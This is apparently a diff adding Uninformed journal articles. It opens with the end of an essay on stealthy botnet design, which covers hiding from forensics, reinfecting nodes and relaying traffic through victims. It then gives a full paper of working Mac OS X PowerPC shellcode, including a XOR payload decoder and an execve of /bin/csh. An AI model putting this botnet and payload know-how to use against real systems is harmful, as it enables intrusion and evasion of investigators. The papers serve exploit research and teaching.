hosts. In order to not have to rely on connecting to the topmost
|
||||
node to collect this type of information, a simple command can be
|
||||
implemented to make the topmost node report this info to any node on
|
||||
the network that asks for it. Using a public key stored into all the
|
||||
nodes, it's even possible to encrypt every piece of information
|
||||
thats destined for the botnet owner, making sure that no one besides
|
||||
the owner can decrypt the data. Although this type of botnet may
|
||||
give a forensics expert or someone with a sniffer information on
|
||||
other nodes that are part of the network, it also offers fast
|
||||
response times and more flexibility in the (ab)use of the network
|
||||
compared to the previous approach with the unlinked nodes. It's a
|
||||
sort of trade off between the biggest possible level of anonymity on
|
||||
one hand, and flexibility on the other. It is a huge step up
|
||||
compared to all of the zombies sitting on IRC servers right now,
|
||||
where a single channel contains the zombies of the entire botnet. By
|
||||
employing cryptography to store the IPs of the child and parent
|
||||
nodes, and keeping those IPs only in RAM mitigates the problem
|
||||
further.
|
||||
|
||||
|
||||
Once a drone network of this type has been established with several
|
||||
hundreds of hosts, there are lots of possibilities of putting it to
|
||||
use. To conceal the originating IP address of a connection, hopping
|
||||
over several nodes of the drone network to a target host can be
|
||||
easily accomplished. A command packet tells one node to bind a port.
|
||||
Once it receives a connection on it, it is told to command a second
|
||||
node to do the same, and from then on node 1 forwards all the
|
||||
traffic to node 2. Node 2 does the same, and forwards to node 3,
|
||||
then 4, maybe 5, until finally the last node connects to the
|
||||
intended destination IP. By encrypting the entire connection from
|
||||
the original source IP address up to the last node, a possible
|
||||
investigator sniffing node 2 will not see the commands (and thus the
|
||||
IP addresses) which tell node 3 to connect to node 4, node 4 to node
|
||||
5, and of course especially not the destination host's address. An
|
||||
idle timeout makes sure that connections don't stay up forever.
|
||||
|
||||
|
||||
As manually updating several hundreds or thousands of hosts is
|
||||
tedious work, an easy updating system should be coded into the
|
||||
nodes. There are basically two possible ways to realize that. A
|
||||
command, distributed from node to node all over the network, could
|
||||
make each node replace itself with a newer version which it may
|
||||
download from a certain HTTP address. The other way is by updating
|
||||
the server software on one node, which in turn distributes this
|
||||
update to all the nodes it's linked to (children and
|
||||
parent), which do just the same. Cryptographic signatures are a must
|
||||
of course to make sure someone doesn't replace all of the precious
|
||||
nodes with SETI@home. Vlad902 suggested a simple and effective way
|
||||
to do that. Each node gets an MD5 hash hardcoded into it. Whenever
|
||||
someone offers a software update, it will download the first X bytes
|
||||
and see wether they hash to the hardcoded value. If they do, the
|
||||
update will be installed. Of course, a forensics expert may extract
|
||||
the hash out of an identified node. However, due to the nature of
|
||||
cryptographic hashes, he won't be able to tell which byte sequence
|
||||
generates that hash. This will prevent the forensics export from
|
||||
creating a malicious update to take down the network. As the value
|
||||
used to generate the hash has to be considered compromised after an
|
||||
update, each update has to supply a new hash value to look out for.
|
||||
|
||||
|
||||
Further security mechanisms could include making the network
|
||||
completely memory resident, and parents keeping track of kids, and
|
||||
reinfecting those if necessary. What never hit the hard-disk can
|
||||
obviously not be found by forensics. Also, commands should be
|
||||
time-stamped to make sure a certain command will only work once, and
|
||||
replay attacks (sending a sniffed command packet to trigger a
|
||||
response from a node) will fail. Using public key cryptography to
|
||||
sign and encrypt data and communication is always a nice idea too,
|
||||
but it also has 2 disadvantages:
|
||||
|
||||
- It usually produces quite a big overhead to incorporate into the code.
|
||||
- Holding the one and only private key matching to a public key thats been
|
||||
found on hundreds of hacked hosts is quite incriminating evidence.
|
||||
|
||||
An additional feature could be the incorporation of global unique
|
||||
identifiers into the network, providing each node with a unique ID
|
||||
that's set upon installation on each new victim. While the network
|
||||
master would have to keep track of host addresses and unique IDs, he
|
||||
could use this feature to his advantage. Imagine a sort of
|
||||
traceroute within the node network. The master wants to know where a
|
||||
certain host is linked to. Every node knows the IDs of all of the
|
||||
child nodes linked hierarchically below it. So he asks the topmost
|
||||
node to find out the path to the node he's interested in. The
|
||||
topmost node realizes it's linked somewhere under child 2, and in
|
||||
turn asks child 2. This node knows it's linked somewhere below child
|
||||
4, and so on and so on. In the end, the master gets his information,
|
||||
a couple of IDs, while no node thats not directly linked to another
|
||||
gets to know the IPs of further hosts that are linked to the
|
||||
network.
|
||||
|
||||
|
||||
Since a portscan shouldn't reveal a compromised host, a raw socket
|
||||
must be used to sniff command packets off the wire. Also, command
|
||||
packets should be structured as unsuspicious as possible, to make it
|
||||
look like the host just got hit by yet another packet of ``internet
|
||||
background noise''. DNS replies or certain values in TCP SYN packets
|
||||
could do the trick.
|
||||
|
||||
|
||||
4.2) The Hybrid
|
||||
|
||||
There is a way to combine both the anonymity of an unlinked network
|
||||
with the quick response time of the linked approach. This can be
|
||||
done by employing a technique first envisioned in the description of
|
||||
a so-called ``Warhol Worm''. While no node knows anything about
|
||||
other nodes, the network master keeps track of the IPs of infected
|
||||
hosts. To distribute a command to a couple or maybe all of the
|
||||
nodes, he first of all prepares an encrypted file containing the IPs
|
||||
of all active nodes, and combines that with the command to execute.
|
||||
He then sends this commandfile to the first node on the list. This
|
||||
node executes the command, takes itself from the list, and goes top
|
||||
to bottom through the list, until it finds another active node,
|
||||
which it transmits the command file to. This way each node will only
|
||||
get to know about other nodes when receiving commandfiles, which are
|
||||
subsequently erased after the file has been successfully transmitted
|
||||
to another node. By calling certain nodes by their unique IDs, it's
|
||||
even possible to make certain nodes take different actions than all
|
||||
the others. By preparing different files and sending them to
|
||||
different nodes at start already, quite a fast distribution time can
|
||||
be achieved. Of course, should someone accomplish to not only sniff
|
||||
the commandfile, but also decrypt it, he has an entire list of
|
||||
infected hosts. Someone sniffing a node will still also see an
|
||||
incoming connection from somewhere, and an outgoing connection to
|
||||
somewhere else, and thus get to know about 2 more nodes. Thats just
|
||||
the same as depicted in the passive approach. Whats different is
|
||||
that a binary analysis of a node will not divulge information on
|
||||
another host of the network. As sniffing is probably more of a
|
||||
threat than binary analysis though, and considering a linked network
|
||||
offers way more flexibility, the Hybrid is most likely an inferior
|
||||
approach.
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
When it comes to botnets, the malcode development is still in it's
|
||||
infancy, and while today's networks are very basic and easily
|
||||
detected, the reader should by now have realized that there are far
|
||||
better and stealthier ways to link compromised hosts into a network.
|
||||
And who knows, maybe one or more advanced networks are already in
|
||||
use nowadays, and even though some of their nodes have been spotted
|
||||
and removed already, the network itself has just not been identified
|
||||
as being one yet.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
The Honeypot Project. Know Your Enemy: Tracking Botnets.
|
||||
http://www.honeynet.org/papers/bots/
|
||||
|
||||
Weaver, Nicholas C. Warhol Worms: The Potential for Very
|
||||
Fast Internet Plagues.
|
||||
http://www.cs.berkeley.edu/ nweaver/warhol.html
|
||||
|
||||
Paxson, Vern, Stuart Staniford Nicholas Weaver. How to
|
||||
0wn the Internet in Your Spare Time.
|
||||
http://www.icir.org/vern/papers/cdc-usenix-sec02/
|
||||
|
||||
Zalewski, Michael. Writing Internet Worms for Fun and
|
||||
Profit.
|
||||
http://www.securitymap.net/sdm/docs/virus/worm.txt
|
510
uninformed/1.6.txt
Normal file
510
uninformed/1.6.txt
Normal file
|
@ -0,0 +1,510 @@
|
|||
|
||||
Mac OS X PPC Shellcode Tricks
|
||||
H D Moore
|
||||
hdm[at]metasploit.com
|
||||
Last modified: 05/09/2005
|
||||
|
||||
0) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
Developing shellcode for Mac OS X is not particularly difficult, but there are
|
||||
a number of tips and techniques that can make the process easier and more eff
|
||||
ective. The independent data and instruction caches of the PowerPC processor
|
||||
can cause a variety of problems with exploit and shellcode development. The
|
||||
common practice of patching opcodes at run-time is much more involved when the
|
||||
instruction cache is in incoherent mode. NULL-free shellcode can be improved by
|
||||
taking advantage of index registers and the reserved bits found in many
|
||||
opcodes, saving space otherwise taken by standard NULL evasion techniques. The
|
||||
Mac OS X operating system introduces a few challenges to unsuspecting
|
||||
developers; system calls change their return address based on whether they
|
||||
succeed and oddities in the Darwin kernel can prevent standard execve()
|
||||
shellcode from working properly with a threaded process. The virtual memory
|
||||
layout on Mac OS X can be abused to overcome instruction cache obstacles and
|
||||
develop even smaller shellcode.
|
||||
|
||||
Thanks:
|
||||
|
||||
The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and
|
||||
the entire Uninformed Journal staff.
|
||||
|
||||
1) Introduction
|
||||
|
||||
With the introduction of Mac OS X, Apple has been viewed with mixed feelings by
|
||||
the security community. On one hand, the BSD core offers the familiar Unix
|
||||
security model that security veterans already understand. On the other, the
|
||||
amount of proprietary extensions, network-enabled software, and growing mass of
|
||||
advisories is giving some a cause for concern. Exploiting buffer overflows,
|
||||
format strings, and other memory-corruption vulnerabilities on Mac OS X is a
|
||||
bit different from what most exploit developers are familiar with. The
|
||||
incoherent instruction cache, combined with the RISC fixed-length instruction
|
||||
set, raises the bar for exploit and payload developers.
|
||||
|
||||
On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
|
||||
for Fun and Profit". B-root's paper covered the basics of Mac OS X shellcode
|
||||
development and built on the PowerPC work by LSD, Palante, and Ghandi. This
|
||||
paper is an attempt to extend, rather than replace, the material already
|
||||
available on writing shellcode for the Mac OS X operating system. The first
|
||||
section covers the fundamentals of the PowerPC architecture and what you need
|
||||
to know to start writing shellcode. The second section focuses on avoiding NULL
|
||||
bytes and other characters through careful use of the PowerPC instruction set.
|
||||
The third section investigates some of the unique behavior of the Mac OS X
|
||||
platform and introduces some useful techniques.
|
||||
|
||||
2) PowerPC Basics
|
||||
|
||||
The PowerPC (PPC) architecture uses a reduced instruction set consisting of
|
||||
32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only
|
||||
be executed by the processor if the opcode is word-aligned in memory.
|
||||
|
||||
|
||||
2.1) Registers
|
||||
|
||||
PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31)
|
||||
PowerPC 64-bit processors have 64-bit general-purpose registers, but still use
|
||||
32-bit opcodes, thirty-two 64-bit floating-point registers (f0-f31), a link
|
||||
register (lr), a count register (ctr), and a handful of other registers for
|
||||
tracking things like branch conditions, integer overflows, and various machine
|
||||
state flags. Some PowerPC processors also contain a vector-processing unit
|
||||
(AltiVec, etc), which can add another thirty-two 128-bit registers to the set.
|
||||
|
||||
|
||||
On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1
|
||||
is used as a stack pointer, and r3 to r7 are used to pass arguments to a system
|
||||
call. General-purpose registers between r3 and r12 are considered volatile and
|
||||
should be preserved before the execution of any system call or library
|
||||
function.
|
||||
|
||||
;;
|
||||
;; Demonstrate execution of the reboot system call
|
||||
;;
|
||||
main:
|
||||
li r0, 55 ; #define SYS_reboot 55
|
||||
sc
|
||||
|
||||
2.2) Branches
|
||||
|
||||
Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
|
||||
Execution flow is controlled by one of the many branch instructions. A branch
|
||||
can redirect execution to a relative address, absolute address, or the value
|
||||
stored in either the link or count registers. Conditional branches are
|
||||
performed based on one of four bit fields in the condition register. The count
|
||||
register can also be used as a condition for branching and some instructions
|
||||
will automatically decrement the count register. A branch instruction can
|
||||
automatically set the link register to be the address following the branch,
|
||||
which is a very simple way to get the absolute address of any relative location
|
||||
in memory.
|
||||
|
||||
;;
|
||||
;; Demonstrate GetPC() through a branch and link instruction
|
||||
;;
|
||||
main:
|
||||
|
||||
xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5
|
||||
; the condition register is updated by the . modifier
|
||||
ppcGetPC:
|
||||
bnel ppcGetPC ; branch if condition is not-equal, which will be false
|
||||
; the address of ppcGetPC+4 is now in the link register
|
||||
|
||||
mflr r5 ; move the link register to r5, which points back here
|
||||
|
||||
|
||||
2.3) Memory
|
||||
|
||||
Memory access on PowerPC is performed through the load and store instructions.
|
||||
Immediate values can be loaded to a register or stored to a location in memory,
|
||||
but the immediate value is limited to 16 bits. When using a load instruction on
|
||||
a non-immediate value, a base register is used, followed by an offset from that
|
||||
register to the desired location. Store instructions work in a similar fashion;
|
||||
the value to be stored is placed into a register, and the store instruction
|
||||
then writes that value to the destination register plus an offset value.
|
||||
Multi-word memory instructions exist, but are considered bad practice to use,
|
||||
since they may not be supported in future PowerPC processors.
|
||||
|
||||
Since each PowerPC instruction is 32 bits wide, it is not possible to load a
|
||||
32-bit address into a register with a single instruction. The standard method
|
||||
of loading a full 32-bit value requires a load-immediate-shift (lis) followed
|
||||
by an or-immediate (ori). The first instruction loads the high 16 bits, while
|
||||
the second loads the lower 16 bits Some people prefer to use
|
||||
add-immediate-shift against the r0 general purpose register. The r0 register
|
||||
has a special property in that anytime it is used for addition or substraction,
|
||||
it is treated as a zero, regardless of the current value 64-bit PowerPC
|
||||
processors require five separate instructions to load a 32-bit immediate value
|
||||
into a general-purpose register. This 16-bit limitation also applies to
|
||||
relative branches and every other instruction that uses an immediate value.
|
||||
|
||||
;;
|
||||
;; Load a 32-bit immediate value and store it to the stack
|
||||
;;
|
||||
main:
|
||||
|
||||
lis r5, 0x1122 ; load the high bits of the value
|
||||
; r5 contains 0x11220000
|
||||
|
||||
ori r5, r5, 0x3344 ; load the low bits of the value
|
||||
; r5 now contains 0x11223344
|
||||
|
||||
stw r5, 20(r1) ; store this value to SP+20
|
||||
lwz r3, 20(r1) ; load this value back to r3
|
||||
|
||||
|
||||
2.4) L1 Cache
|
||||
|
||||
The PowerPC processor uses one or more on-chip memory caches to accelerate
|
||||
access to frequently referenced data and instructions. This cache memory is
|
||||
separated into a distinct data and instruction cache. Although the data cache
|
||||
operates in coherent mode on Mac OS X, shellcode developers need to be aware of
|
||||
how the data cache and the instruction cache interoperate when executing
|
||||
self-modifying code.
|
||||
|
||||
As a superscalar architecture, the PowerPC processor contains multiple
|
||||
execution units, each of which has a pipeline. The pipeline can be described as
|
||||
a conveyor belt in a factory; as an instruction moves down the belt, specific
|
||||
steps are performed. To increase the efficiency of the pipeline, multiple
|
||||
instructions can put on the belt at the same time, one behind another. The
|
||||
processor will attempt to predict which direction a branch instruction will
|
||||
take and then feed the pipeline with instructions from the predicted path. If
|
||||
the prediction was wrong, the contents of the pipeline are trashed and correct
|
||||
instructions are loaded into the pipeline instead.
|
||||
|
||||
This pipelined execution means that more than one instruction can be processed
|
||||
at the same time in each execution unit. If one instruction requires the output
|
||||
of another, a gap can occur in the pipeline while these dependencies are
|
||||
satisfied. In the case of store instruction, the contents of the data cache
|
||||
will be updated before the results are flushed back to main memory. If a load
|
||||
instruction is executed directly after the store, it will obtain the
|
||||
newly-updated value. This occurs because the load instruction will read the
|
||||
value from the data cache, where it has already been updated.
|
||||
|
||||
The instruction cache is a different beast altogether. On the PowerPC platform,
|
||||
the instruction cache is incoherent. If an executable region of memory is
|
||||
modified and that region is already loaded into the instruction cache, the
|
||||
modifed instructions will not be executed unless the cache is specifically
|
||||
flushed. The instruction cache is filled from main memory, not the data cache.
|
||||
If you attempt to modify executable code through a store instruction, flush the
|
||||
cache, and then attempt to execute that code, there is still a chance that the
|
||||
original, unmodified code will be executed instead. This can occur because the
|
||||
data cache was not flushed back to main memory before the instruction cache was
|
||||
filled.
|
||||
|
||||
The solution is a bit tricky, you must use the "dcbf" instruction to invalidate
|
||||
each block of memory from the data cache, wait for the invalidation to complete
|
||||
with the "sync" instruction, and then flush the instruction cache for that
|
||||
block with "icbi". Finally, the "isync" instruction needs to be executed before
|
||||
the modified code is actually used. Placing these instructions in any other
|
||||
order may result in stale data being left in the instruction cache. Due to
|
||||
these restrictions, self-modifying shellcode on the PowerPC platform is rare
|
||||
and often unreliable.
|
||||
|
||||
The example below is a working PowerPC shellcode decoder included with the
|
||||
Metasploit Framework (OSXPPCLongXOR).
|
||||
|
||||
;;
|
||||
;; Demonstrate a cache-safe payload decoder
|
||||
;; Based on Dino Dai Zovi's PPC decoder (20030821)
|
||||
;;
|
||||
main:
|
||||
xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal'
|
||||
bnel main ; Branch if cr0 is not-equal and link to LMain
|
||||
mflr r31 ; Move the address of LMain into r31
|
||||
addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
|
||||
; 1974 is null eliding constant
|
||||
subi r5, r5, 1974 ; We need this for the dcbf and icbi
|
||||
lis r6, 0x9999 ; XOR key = hi16(0x99999999)
|
||||
ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999)
|
||||
addi r4, r5, 1974 + 4 ; Move the number of words to code into r4
|
||||
mtctr r4 ; Set the count register to the word count
|
||||
|
||||
xorlp:
|
||||
lwz r4, -1974(r31) ; Load the encoded word into memory
|
||||
xor r4, r4, r6 ; XOR this word against our key in r6
|
||||
stw r4, -1974(r31) ; Store the modified work back to memory
|
||||
dcbf r5, r31 ; Flush the modified word to main memory
|
||||
.long 0x7cff04ac ; Wait for the data block flush (sync)
|
||||
icbi r5, r31 ; Invalidate prefetched block from i-cache
|
||||
|
||||
subi r30, r5, -1978 ; Move to next word without using a NULL
|
||||
add. r31, r31, r30
|
||||
|
||||
bdnz- xorlp ; Branch if --count == 0
|
||||
.long 0x4cff012c ; Wait for i-cache to synchronize (isync)
|
||||
|
||||
; Insert XORed payload here
|
||||
.long (0x7fe00008 ^ 0x99999999)
|
||||
|
||||
3) Avoiding NULLs
|
||||
|
||||
One of the most common problems encountered with shellcode development in
|
||||
general and RISC processors in particular is avoiding NULL bytes in the
|
||||
assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
|
||||
mostly due to the variable-length instruction set and multiple opcodes
|
||||
available for a given task. Fixed-width opcode architectures, like PowerPC,
|
||||
have fixed field sizes and often pad those fields with all zero bits.
|
||||
Instructions that have a set of undefined bits often set these bits to zero as
|
||||
well. The result is that many of the available opcodes are impossible to use
|
||||
with NULL-free shellcode without modification.
|
||||
|
||||
On many platforms, self-modifying code can be used to work around NULL byte
|
||||
restrictions. This technique is not useful for single-instruction patching on
|
||||
PowerPC, since the instruction pre-fetch and instruction cache can result in
|
||||
the non-modified instruction being executed instead.
|
||||
|
||||
|
||||
3.1) Undefined Bits
|
||||
|
||||
To write interesting shellcode for Mac OS X, you need to use system calls. One
|
||||
of the first problems encountered with the PowerPC platform is that the system
|
||||
call instruction assembles to 0x44000002, which contains two NULL bytes. If we
|
||||
take a look at the IBM PowerPC reference for the 'sc' instruction, we see that
|
||||
the bit layout is as follows:
|
||||
|
||||
010001 00000 00000 0000 0000000 000 1 0
|
||||
------ ----- ----- ---- ------- --- - -
|
||||
A B C D E F G H
|
||||
|
||||
These 32 bits are broken down into eight specific fields. The first field (A),
|
||||
which is 5 bits wide, must be set to the value 17. The bits that make up B, C,
|
||||
and D are all marked as undefined. Field E is must either be set to 1 or 0.
|
||||
Fields F and H are undefined, and G must always be set to 1. We can modify the
|
||||
undefined bits to anything we like, in order to make the corresponding byte
|
||||
values NULL-free. The first step is to reorder these bits along byte boundaries
|
||||
and mark what we are able to change.
|
||||
|
||||
? = undefined
|
||||
# = zero or one
|
||||
[010001??] [????????] [????0000] [00#???1?]
|
||||
|
||||
The first byte of this instruction can be either 68, 69, 70, or 71 (DEFG). The
|
||||
second byte can be any character at all. The third byte can either be 0, 16,
|
||||
32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which
|
||||
contains '0', 'P', and 'p', among others). The fourth value can be any of the
|
||||
following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31,
|
||||
34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see,
|
||||
it is possible to create thousands of different opcodes that are all treated by
|
||||
the processor as a system call. The same technique can be applied to almost any
|
||||
other instruction that has undefined bits. Although the current line of PowerPC
|
||||
chips used with Mac OS X seem to ignore the undefined bits, future processors
|
||||
may actually use these bits. It is entirely possible that undefined bit abuse
|
||||
can prevent your code from working on newer processors
|
||||
|
||||
;;
|
||||
;; Patching the undefined bits in the 'sc' opcode
|
||||
;;
|
||||
main:
|
||||
li r0, 1 ; sys_exit
|
||||
li r3, 0 ; exit status
|
||||
.long 0x45585037 ; sc patched as "EXP7"
|
||||
|
||||
|
||||
3.2) Index Registers
|
||||
|
||||
On the PowerPC platform, immediate values are encoded using all 16 bits. If the
|
||||
assembled value of your immediate contains a NULL, you will need to find another
|
||||
way to load it into the target register. The most common technique is to first
|
||||
load a NULL-free value into a register, then substract that value minus the
|
||||
difference to your immediate.
|
||||
|
||||
;;
|
||||
;; Demonstrate index register usage
|
||||
;;
|
||||
main:
|
||||
li r7, 1999 ; place a NULL-free value into the index
|
||||
subi r5, r7, 1999-1 ; substract our value minus the target
|
||||
; the r5 register is now set to 1
|
||||
|
||||
If you have a rough idea of the immediate values you will need in your
|
||||
shellcode, you can take this a step further. Set your initial index register to
|
||||
a value, that when decremented by the immediate value, actually results in a
|
||||
character of your choice. If you have two distant ranges (1-10 and 50-60), then
|
||||
consider using two index registers. The example below demonstrates an index
|
||||
register that works for the system call number as well as the arguments,
|
||||
leaving the assembled bytes NULL-free. As you can see, besides the four bytes
|
||||
required to set the index register, this method does not significantly increase
|
||||
the size of the code.
|
||||
|
||||
;;
|
||||
;; Create a TCP socket without NULL bytes
|
||||
;;
|
||||
main:
|
||||
li r7, 0x3330 ; 0x38e03330 = NULL-free index value
|
||||
subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket
|
||||
subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain
|
||||
subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type
|
||||
subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol
|
||||
.long 0x45585037 ; patched 'sc' instruction
|
||||
|
||||
|
||||
3.3) Branching
|
||||
|
||||
Branching to a forward address without using NULL bytes can be tricky on
|
||||
PowerPC systems. If you try branching forward, but less than 256 bytes, your
|
||||
opcode will contain a NULL. If you obtain your current address and want to
|
||||
branch to an offset from it, you will need to place the target address into the
|
||||
count register (ctr) or the link register (lr). If you decide to use the link
|
||||
register, you will notice that every valid form of "blr" has a NULL byte. You
|
||||
can avoid the NULL byte by setting the branch hint bits (19-20) to "11"
|
||||
(unpredictable branch, do not optimize). The resulting opcode becomes
|
||||
0x4e804820 instead of 0x4e800020 for the standard "blr" instruction.
|
||||
|
||||
The branch prediction bit (bit 10) can also come in handy, it is useful if you
|
||||
need to change the second byte of the branch instruction to a different
|
||||
character. The prediction bit tells the processor how likely it is that the
|
||||
instruction will result in a branch. To specify the branch prediction bit in
|
||||
the assembly source, just place '-' or '+' after the branch instruction.
|
||||
|
||||
|
||||
4) Mac OS X Tricks
|
||||
|
||||
This section describes a handful of tips and tricks for writing shellcode on
|
||||
the Mac OS X platform.
|
||||
|
||||
|
||||
4.1) Diagnostic Tools
|
||||
|
||||
Mac OS X includes a solid collection of development and diagnostic tools, many
|
||||
of which are invaluable for shellcode and exploit development. The list below
|
||||
describes some of the most commonly used tools and how they relate to shellcode
|
||||
development.
|
||||
|
||||
Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not
|
||||
included and most disassembly needs to be done with 'gdb' or 'otool'.
|
||||
ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss
|
||||
on Solaris. There is no better tool for quickly diagnosing shellcode
|
||||
bugs.
|
||||
vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it.
|
||||
Use vmmap to figure out where the heap, library, and stacks are mapped.
|
||||
crashreporterd: This daemon runs by default and creates very nice crash dumps
|
||||
when a system service dies. Invaluable for finding 0-day in Mac OS X
|
||||
services. The crashdump logs can be found in /Library/Logs/CrashReporter.
|
||||
heap: Quickly list all heaps in a process. This can be handy when the
|
||||
instruction cache prevents a direct return and you need to find an
|
||||
alternate shellcode location.
|
||||
otool: List all libraries linked to a given binary, disassemble mach-o
|
||||
binaries, and display the contents of any section of an executable or
|
||||
library. This is the equivalent of 'ldd' and 'objdump' rolled into a
|
||||
single utility
|
||||
|
||||
|
||||
4.2) System Call Failure
|
||||
|
||||
An interesting feature of Mac OS X is that a successful system call will return
|
||||
to the address 4 bytes after the end of 'sc' instruction and a failed system
|
||||
call will return directly after the 'sc' instruction. This allows you to
|
||||
execute a specific instruction only when the system call fails. The most common
|
||||
application of this feature is to branch to an error handler, although it can
|
||||
also be used to set a flag or a return value. When writing shellcode, this
|
||||
feature is usually more annoying than anything else, since it boosts the size
|
||||
of your code by four bytes per system call. In some cases though, this feature
|
||||
can be used to shave an instruction or two off the final payload.
|
||||
|
||||
|
||||
4.3) Threads and Execve
|
||||
|
||||
Mac OS X has an undocumented behavior concerning the execve() system call
|
||||
inside a threaded process. If a process tries to call execve() and has more
|
||||
than one active thread, the kernel returns the error EOPNOTSUPP. After a closer
|
||||
look at kernexec.c in the Darwin XNU source code, it becomes apparent that for
|
||||
shellcode to function properly inside a threaded process, it will need to call
|
||||
either fork() or vfork() before calling execve().
|
||||
|
||||
;;
|
||||
;; Fork and execute a command shell
|
||||
;;
|
||||
main:
|
||||
_fork:
|
||||
li r0, 2
|
||||
sc
|
||||
b _exitproc
|
||||
|
||||
_execsh: ; based on ghandi's execve
|
||||
xor. r5, r5, r5
|
||||
bnel _execsh
|
||||
mflr r3
|
||||
addi r3, r3, 32 ; 32
|
||||
stw r3, -8(r1) ; argv[0] = path
|
||||
stw r5, -4(r1) ; argv[1] = NULL
|
||||
subi r4, r1, 8 ; r4 = {path, 0}
|
||||
li r0, 59
|
||||
sc ; execve(path, argv, NULL)
|
||||
b _exitproc
|
||||
|
||||
_path:
|
||||
.ascii "/bin/csh" ; csh handles seteuid() for us
|
||||
.long 0
|
||||
|
||||
_exitproc:
|
||||
li r0, 1
|
||||
li r3, 0
|
||||
sc
|
||||
|
||||
4.4) Shared Libraries
|
||||
|
||||
The Mac OS X user community tends to have one thing in common -- they keep
|
||||
their systems up to date. The Apple Software Update service, once enabled, is
|
||||
very insistent about installing new software releases as they become available.
|
||||
The result is that nearly every single Mac OS X system has the exact same
|
||||
binaries. System libraries are often loaded at the exact same virtual address
|
||||
across all applications. In this sense, Mac OS X is starting to resemble the
|
||||
Windows platform.
|
||||
|
||||
If all processes on all Mac OS X system have the same virtual addresses for the
|
||||
same libraries, Windows-style shellcode starts to become possible. Assuming you
|
||||
can find the right argument-setting code in a shared library, return-to-library
|
||||
payloads also become much more feasible. These libraries can be used as return
|
||||
addresses, similar to how Windows exploits often return back to a loaded DLL.
|
||||
Some useful addresses are listed below:
|
||||
|
||||
|
||||
0x90000000: The base address of the system library (libSystem.B.dylib), most
|
||||
of the function locations are static across all versions of OS X.
|
||||
0xffff8000: The base address of the "common" page. A number of useful
|
||||
functions and instructions can be found here. These functions
|
||||
include memcpy, sysdcacheflush, sysicacheinvalidate, and bcopy.
|
||||
|
||||
|
||||
The following NULL-free example uses the sysicacheinvalidate function to flush
|
||||
1040 bytes from the instruction cache, starting at the address of the payload:
|
||||
|
||||
;;
|
||||
;; Flush the instruction cache in 32 bytes
|
||||
;;
|
||||
main:
|
||||
_main:
|
||||
xor. r5, r5, r5
|
||||
bnel main
|
||||
mflr r3
|
||||
|
||||
;; flush 1040 bytes starting after the branch
|
||||
li r4, 1024+16
|
||||
|
||||
;; 0xffff8520 is __sys_icache_invalidate()
|
||||
addis r8, r5, hi16(0xffff8520)
|
||||
ori r8, r8, lo16(0xffff8520)
|
||||
mtctr r8
|
||||
bctrl
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
In the first section, we covered the fundamentals of the PowerPC platform and
|
||||
described the syscall calling convention used on the Darwin/Mac OS X platform.
|
||||
The second section introduced a few techniques for removing NULL bytes from
|
||||
some common instructions. In the third section, we presented some of the tools
|
||||
and techniques that can be useful for shellcode development.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
B-r00t PowerPC / OSX (Darwin) Shellcode Assembly.
|
||||
http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf
|
||||
|
||||
|
||||
Bunda, Potter, Shadowen Powerpc Microprocessor Developer\'s Guide.
|
||||
http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/
|
||||
|
||||
Steve Heath Newnes Power PC Programming Pocket Book.
|
||||
http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/
|
||||
|
||||
|
||||
IBM PowerPC Assembler Language Reference.
|
||||
http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm
|
567
uninformed/1.7.txt
Normal file
567
uninformed/1.7.txt
Normal file
|
@ -0,0 +1,567 @@
|
|||
What Were They Thinking?
|
||||
Annoyances Caused by Unsafe Assumptions
|
||||
skape
|
||||
mmiller@hick.org
|
||||
Last modified: 04/04/2005
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
There is perhaps no issue more dear to a developer's heart than the
|
||||
issue of interoperability with third-party applications. In some
|
||||
cases, software that is being written by one developer has to be
|
||||
altered in order to make it function properly when used in
|
||||
conjunction with another application that is created by a
|
||||
third-party. For the sake of illustration, the lone developer will
|
||||
henceforth be referred to as the protagonist given his or her
|
||||
valiant efforts in their quest to obtain that which is almost always
|
||||
unattainable: interoperability. The third-parties, on the other
|
||||
hand, will be referred to as the antagonists due to their wretched
|
||||
attempts to prevent the protagonist from obtaining his or her goal
|
||||
of a utopian software environment. Now, granted, that's not to say
|
||||
that the protagonist can't also become the antagonist by continuing
|
||||
the ugly cycle of exposing compatibility issues to other would-be
|
||||
protagonists, but for the sake of discussion such a point is not
|
||||
relevant.
|
||||
|
||||
What is relevant, however, are the ways in which an antagonistic
|
||||
developer can write software that will force other developers to
|
||||
work around issues exposed by the software that the antagonist has
|
||||
written. There are far too many specific issues to list, but the
|
||||
majority of these issues can be generalized into one category that
|
||||
will serve as the focus for this document. To put it simply, many
|
||||
developers make assumptions about the state of the machine that
|
||||
their software will be executing on. For instance, some software
|
||||
will assume that they are the only piece of software performing a
|
||||
given task on a machine. In the event that another piece of software
|
||||
